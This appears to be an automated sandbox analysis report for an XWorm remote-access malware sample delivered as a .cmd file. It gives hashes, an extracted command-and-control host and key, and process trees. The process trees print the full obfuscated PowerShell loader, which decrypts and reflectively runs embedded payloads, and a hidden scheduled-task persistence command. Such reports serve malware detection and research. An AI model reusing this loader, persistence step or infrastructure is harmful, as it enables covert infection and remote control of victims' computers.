Analysis
-
max time kernel
5s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
01-07-2024 01:00
Static task
static1
Behavioral task
behavioral1
Sample
0a0a6608a80b982fc1f0897b89c9ffa58ba58e3c2d1c200155e47c495b0c6150.cmd
Resource
win7-20240419-en
General
-
Target
0a0a6608a80b982fc1f0897b89c9ffa58ba58e3c2d1c200155e47c495b0c6150.cmd
-
Size
500KB
-
MD5
6e45850d43bde1d6bc68ab6b07daf153
-
SHA1
427ed64bb89e6bf40e59276768d37152c209e976
-
SHA256
0a0a6608a80b982fc1f0897b89c9ffa58ba58e3c2d1c200155e47c495b0c6150
-
SHA512
e44ea25026d2146991e61eb82ed6028af248fb9235b271f665943b432833e3274a3e9ae9ffc912436b294e6a450337cbd251daafad11c926a41cc942042b4f81
-
SSDEEP
12288:Co8xbtgA4f9Ek3aoC4QvfD2ZK1n6B4XyZYi9lGUnnQ:Co8NtsaCm1nhqD9ginQ
Malware Config
Extracted
xworm
5.0
korkos.now-dns.net:999
PloDJK2PhSuWy8rU
-
install_file
USB.exe
Signatures
-
Detect Xworm Payload 1 IoCs
Processes:
resource yara_rule behavioral2/memory/4372-67-0x0000020345DD0000-0x0000020345DE2000-memory.dmp family_xworm -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid process 2216 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 2216 powershell.exe -
Suspicious use of WriteProcessMemory 22 IoCs
Processes:
cmd.exedescription pid process target process PID 568 wrote to memory of 3236 568 cmd.exe cmd.exe PID 568 wrote to memory of 3236 568 cmd.exe cmd.exe PID 568 wrote to memory of 4936 568 cmd.exe cmd.exe PID 568 wrote to memory of 4936 568 cmd.exe cmd.exe PID 568 wrote to memory of 5024 568 cmd.exe cmd.exe PID 568 wrote to memory of 5024 568 cmd.exe cmd.exe PID 568 wrote to memory of 3296 568 cmd.exe cmd.exe PID 568 wrote to memory of 3296 568 cmd.exe cmd.exe PID 568 wrote to memory of 4028 568 cmd.exe Conhost.exe PID 568 wrote to memory of 4028 568 cmd.exe Conhost.exe PID 568 wrote to memory of 984 568 cmd.exe cmd.exe PID 568 wrote to memory of 984 568 cmd.exe cmd.exe PID 568 wrote to memory of 3084 568 cmd.exe cmd.exe PID 568 wrote to memory of 3084 568 cmd.exe cmd.exe PID 568 wrote to memory of 3228 568 cmd.exe cmd.exe PID 568 wrote to memory of 3228 568 cmd.exe cmd.exe PID 568 wrote to memory of 5052 568 cmd.exe cmd.exe PID 568 wrote to memory of 5052 568 cmd.exe cmd.exe PID 568 wrote to memory of 3840 568 cmd.exe cmd.exe PID 568 wrote to memory of 3840 568 cmd.exe cmd.exe PID 568 wrote to memory of 2216 568 cmd.exe powershell.exe PID 568 wrote to memory of 2216 568 cmd.exe powershell.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\0a0a6608a80b982fc1f0897b89c9ffa58ba58e3c2d1c200155e47c495b0c6150.cmd"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c "set __=^&rem"2⤵
-
C:\Windows\system32\cmd.execmd /c "set __=^&rem"2⤵
-
C:\Windows\system32\cmd.execmd /c "set __=^&rem"2⤵
-
C:\Windows\system32\cmd.execmd /c "set __=^&rem"2⤵
-
C:\Windows\system32\cmd.execmd /c "set __=^&rem"2⤵
-
C:\Windows\system32\cmd.execmd /c "set __=^&rem"2⤵
-
C:\Windows\system32\cmd.execmd /c "set __=^&rem"2⤵
-
C:\Windows\system32\cmd.execmd /c "set __=^&rem"2⤵
-
C:\Windows\system32\cmd.execmd /c "set __=^&rem"2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo cls;function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::FromBase64String('wNcFKur0Jl7450HdnpBnzjJ0VkczGUUgZCayB4N/z5k='); $aes_var.IV=[System.Convert]::FromBase64String('LnVH8Q3dknv++SzltewTug=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $ZpTQS=New-Object System.IO.MemoryStream(,$param_var); $OYGBL=New-Object System.IO.MemoryStream; $STZRP=New-Object System.IO.Compression.GZipStream($ZpTQS, [IO.Compression.CompressionMode]::Decompress); $STZRP.CopyTo($OYGBL); $STZRP.Dispose(); $ZpTQS.Dispose(); $OYGBL.Dispose(); $OYGBL.ToArray();}function execute_function($param_var,$param2_var){ $QnAOk=[System.Reflection.Assembly]::Load([byte[]]$param_var); $GDXEp=$QnAOk.EntryPoint; $GDXEp.Invoke($null, $param2_var);}$pPyzM = 'C:\Users\Admin\AppData\Local\Temp\0a0a6608a80b982fc1f0897b89c9ffa58ba58e3c2d1c200155e47c495b0c6150.cmd';$host.UI.RawUI.WindowTitle = $pPyzM;$CtNBM=[System.IO.File]::ReadAllText($pPyzM).Split([Environment]::NewLine);foreach ($oZZUg in $CtNBM) { if ($oZZUg.StartsWith('IrzEsjacAQqOMrEShQQm')) { $GKlON=$oZZUg.Substring(20); break; }}$payloads_var=[string[]]$GKlON.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));$payload3_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[2].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var $null;execute_function $payload3_var (,[string[]] ('')); "2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\0a0a6608a80b982fc1f0897b89c9ffa58ba58e3c2d1c200155e47c495b0c6150.cmd" "3⤵
-
C:\Windows\system32\cmd.execmd /c "set __=^&rem"4⤵
-
C:\Windows\system32\cmd.execmd /c "set __=^&rem"4⤵
-
C:\Windows\system32\cmd.execmd /c "set __=^&rem"4⤵
-
C:\Windows\system32\cmd.execmd /c "set __=^&rem"4⤵
-
C:\Windows\system32\cmd.execmd /c "set __=^&rem"4⤵
-
C:\Windows\system32\cmd.execmd /c "set __=^&rem"4⤵
-
C:\Windows\system32\cmd.execmd /c "set __=^&rem"4⤵
-
C:\Windows\system32\cmd.execmd /c "set __=^&rem"4⤵
-
C:\Windows\system32\cmd.execmd /c "set __=^&rem"4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo cls;function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::FromBase64String('wNcFKur0Jl7450HdnpBnzjJ0VkczGUUgZCayB4N/z5k='); $aes_var.IV=[System.Convert]::FromBase64String('LnVH8Q3dknv++SzltewTug=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $ZpTQS=New-Object System.IO.MemoryStream(,$param_var); $OYGBL=New-Object System.IO.MemoryStream; $STZRP=New-Object System.IO.Compression.GZipStream($ZpTQS, [IO.Compression.CompressionMode]::Decompress); $STZRP.CopyTo($OYGBL); $STZRP.Dispose(); $ZpTQS.Dispose(); $OYGBL.Dispose(); $OYGBL.ToArray();}function execute_function($param_var,$param2_var){ $QnAOk=[System.Reflection.Assembly]::Load([byte[]]$param_var); $GDXEp=$QnAOk.EntryPoint; $GDXEp.Invoke($null, $param2_var);}$pPyzM = 'C:\Users\Admin\AppData\Local\Temp\0a0a6608a80b982fc1f0897b89c9ffa58ba58e3c2d1c200155e47c495b0c6150.cmd';$host.UI.RawUI.WindowTitle = $pPyzM;$CtNBM=[System.IO.File]::ReadAllText($pPyzM).Split([Environment]::NewLine);foreach ($oZZUg in $CtNBM) { if ($oZZUg.StartsWith('IrzEsjacAQqOMrEShQQm')) { $GKlON=$oZZUg.Substring(20); break; }}$payloads_var=[string[]]$GKlON.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));$payload3_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[2].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var $null;execute_function $payload3_var (,[string[]] ('')); "4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\0a0a6608a80b982fc1f0897b89c9ffa58ba58e3c2d1c200155e47c495b0c6150')5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote startup_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\$phantom-SCV.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force5⤵
- Command and Scripting Interpreter: PowerShell
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=1328 --field-trial-handle=3060,i,1774866140584649235,8085848018931772189,262144 --variations-seed-version /prefetch:81⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
3KB
MD550c591ec2a1e49297738ea9f28e3ad23
SHA1137e36b4c7c40900138a6bcf8cf5a3cce4d142af
SHA2567648d785bda8cef95176c70711418cf3f18e065f7710f2ef467884b4887d8447
SHA51233b5fa32501855c2617a822a4e1a2c9b71f2cf27e1b896cf6e5a28473cfd5e6d126840ca1aa1f59ef32b0d0a82a2a95c94a9cc8b845367b61e65ec70d456deec
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheFilesize
53KB
MD5a26df49623eff12a70a93f649776dab7
SHA1efb53bd0df3ac34bd119adf8788127ad57e53803
SHA2564ebde1c12625cb55034d47e5169f709b0bd02a8caa76b5b9854efad7f4710245
SHA512e5f9b8645fb2a50763fcbffe877ca03e9cadf099fe2d510b74bfa9ff18d0a6563d11160e00f495eeefebde63450d0ade8d6b6a824e68bd8a59e1971dc842709c
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-InteractiveFilesize
2KB
MD5005bc2ef5a9d890fb2297be6a36f01c2
SHA10c52adee1316c54b0bfdc510c0963196e7ebb430
SHA256342544f99b409fd415b305cb8c2212c3e1d95efc25e78f6bf8194e866ac45b5d
SHA512f8aadbd743495d24d9476a5bb12c8f93ffb7b3cc8a8c8ecb49fd50411330c676c007da6a3d62258d5f13dd5dacc91b28c5577f7fbf53c090b52e802f5cc4ea22
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD50cbc923c35550088c27d279ef0a02bcc
SHA115fc7e957f2643837eb4e0e0a84069a7cba301e3
SHA2567ad6c691019cbad37cf422666ea4694b8cdac7ed9ecb04005c4dab7d9371b0dc
SHA512598b587386814562ef2069ea893c2fbafe733801ca33a7fc1a2028b796f80ad4995aa106e032cf2e5069ce0875e5b42167e5b9df3e32c4cad317b8efbed4022b
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mkwrube0.kyk.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
memory/384-68-0x00007FFA14A90000-0x00007FFA14AA0000-memory.dmpFilesize
64KB
-
memory/524-99-0x00007FFA14A90000-0x00007FFA14AA0000-memory.dmpFilesize
64KB
-
memory/904-103-0x00007FFA14A90000-0x00007FFA14AA0000-memory.dmpFilesize
64KB
-
memory/956-72-0x00007FFA14A90000-0x00007FFA14AA0000-memory.dmpFilesize
64KB
-
memory/1096-102-0x00007FFA14A90000-0x00007FFA14AA0000-memory.dmpFilesize
64KB
-
memory/1340-95-0x00007FFA14A90000-0x00007FFA14AA0000-memory.dmpFilesize
64KB
-
memory/1364-70-0x00007FFA14A90000-0x00007FFA14AA0000-memory.dmpFilesize
64KB
-
memory/1468-108-0x00007FFA14A90000-0x00007FFA14AA0000-memory.dmpFilesize
64KB
-
memory/1480-104-0x00007FFA14A90000-0x00007FFA14AA0000-memory.dmpFilesize
64KB
-
memory/1488-109-0x00007FFA14A90000-0x00007FFA14AA0000-memory.dmpFilesize
64KB
-
memory/1552-77-0x00007FFA14A90000-0x00007FFA14AA0000-memory.dmpFilesize
64KB
-
memory/1660-116-0x00007FFA14A90000-0x00007FFA14AA0000-memory.dmpFilesize
64KB
-
memory/1724-97-0x00007FFA14A90000-0x00007FFA14AA0000-memory.dmpFilesize
64KB
-
memory/1752-76-0x00007FFA14A90000-0x00007FFA14AA0000-memory.dmpFilesize
64KB
-
memory/1948-71-0x00007FFA14A90000-0x00007FFA14AA0000-memory.dmpFilesize
64KB
-
memory/1956-69-0x00007FFA14A90000-0x00007FFA14AA0000-memory.dmpFilesize
64KB
-
memory/2084-100-0x00007FFA14A90000-0x00007FFA14AA0000-memory.dmpFilesize
64KB
-
memory/2088-107-0x00007FFA14A90000-0x00007FFA14AA0000-memory.dmpFilesize
64KB
-
memory/2148-73-0x00007FFA14A90000-0x00007FFA14AA0000-memory.dmpFilesize
64KB
-
memory/2216-13-0x000001961DAB0000-0x000001961DAB8000-memory.dmpFilesize
32KB
-
memory/2216-17-0x000001961DB30000-0x000001961DB66000-memory.dmpFilesize
216KB
-
memory/2216-15-0x00007FFA54A10000-0x00007FFA54C05000-memory.dmpFilesize
2.0MB
-
memory/2216-16-0x00007FFA54230000-0x00007FFA542EE000-memory.dmpFilesize
760KB
-
memory/2216-14-0x000001961DAC0000-0x000001961DAD0000-memory.dmpFilesize
64KB
-
memory/2216-5-0x000001961D5C0000-0x000001961D5E2000-memory.dmpFilesize
136KB
-
memory/2216-11-0x000001961DBB0000-0x000001961DC26000-memory.dmpFilesize
472KB
-
memory/2216-10-0x000001961DAE0000-0x000001961DB24000-memory.dmpFilesize
272KB
-
memory/2496-96-0x00007FFA14A90000-0x00007FFA14AA0000-memory.dmpFilesize
64KB
-
memory/2508-115-0x00007FFA14A90000-0x00007FFA14AA0000-memory.dmpFilesize
64KB
-
memory/2520-98-0x00007FFA14A90000-0x00007FFA14AA0000-memory.dmpFilesize
64KB
-
memory/2900-105-0x00007FFA14A90000-0x00007FFA14AA0000-memory.dmpFilesize
64KB
-
memory/3336-66-0x00007FFA14A90000-0x00007FFA14AA0000-memory.dmpFilesize
64KB
-
memory/3336-56-0x0000000003020000-0x000000000304A000-memory.dmpFilesize
168KB
-
memory/3508-74-0x00007FFA14A90000-0x00007FFA14AA0000-memory.dmpFilesize
64KB
-
memory/4228-106-0x00007FFA14A90000-0x00007FFA14AA0000-memory.dmpFilesize
64KB
-
memory/4372-33-0x00007FFA54230000-0x00007FFA542EE000-memory.dmpFilesize
760KB
-
memory/4372-67-0x0000020345DD0000-0x0000020345DE2000-memory.dmpFilesize
72KB
-
memory/4372-32-0x00007FFA54A10000-0x00007FFA54C05000-memory.dmpFilesize
2.0MB
-
memory/4848-101-0x00007FFA14A90000-0x00007FFA14AA0000-memory.dmpFilesize
64KB